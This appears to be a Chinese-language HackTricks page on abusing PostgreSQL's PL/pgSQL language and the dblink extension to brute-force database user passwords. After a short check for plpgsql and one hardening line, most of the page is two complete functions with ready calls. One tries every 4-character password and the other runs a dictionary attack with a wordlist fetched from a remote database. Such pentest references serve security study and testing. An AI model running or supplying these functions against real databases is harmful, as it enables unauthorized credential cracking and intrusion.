PL/pgSQL Password Bruteforce

从零开始学习AWS黑客技术 htARTE（HackTricks AWS红队专家）！

您在网络安全公司工作吗？您想看到您的公司在HackTricks中做广告吗？或者您想访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划!
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入💬 Discord群](https://discord.gg/hRep4RUj7f) 或电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。

PL/pgSQL是一种功能齐全的编程语言，通过提供增强的过程控制，扩展了SQL的功能。这包括利用循环和各种控制结构。使用PL/pgSQL语言编写的函数可以被SQL语句和触发器调用，扩大了数据库环境中的操作范围。

您可以滥用这种语言，要求PostgreSQL暴力破解用户凭据，但它必须存在于数据库中。您可以使用以下方法验证其存在：

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

默认情况下，创建函数是授予PUBLIC的权限，其中PUBLIC指的是数据库系统中的每个用户。为了防止这种情况发生，管理员可能需要从PUBLIC域中撤销USAGE权限：

REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

在这种情况下，我们先前的查询将输出不同的结果：

SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

请注意，为了使以下脚本正常工作，需要存在dblink函数。如果不存在，您可以尝试使用以下方法创建：

CREATE EXTENSION dblink;

密码暴力破解

以下是如何执行4个字符密码的暴力破解：

//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

请注意，即使是暴力破解4个字符的密码也可能需要几分钟的时间。

您还可以下载一个单词列表，然后只尝试这些密码（字典攻击）：

//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

您在网络安全公司工作吗？想要看到您的公司在HackTricks中宣传吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划!
发现我们的独家NFT收藏品The PEASS Family
获取官方PEASS & HackTricks周边
加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
通过向hacktricks repo 和 hacktricks-cloud repo 提交PR来分享您的黑客技巧。

上一页dblink/lo_import data exfiltration 下一页Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

最后更新于2个月前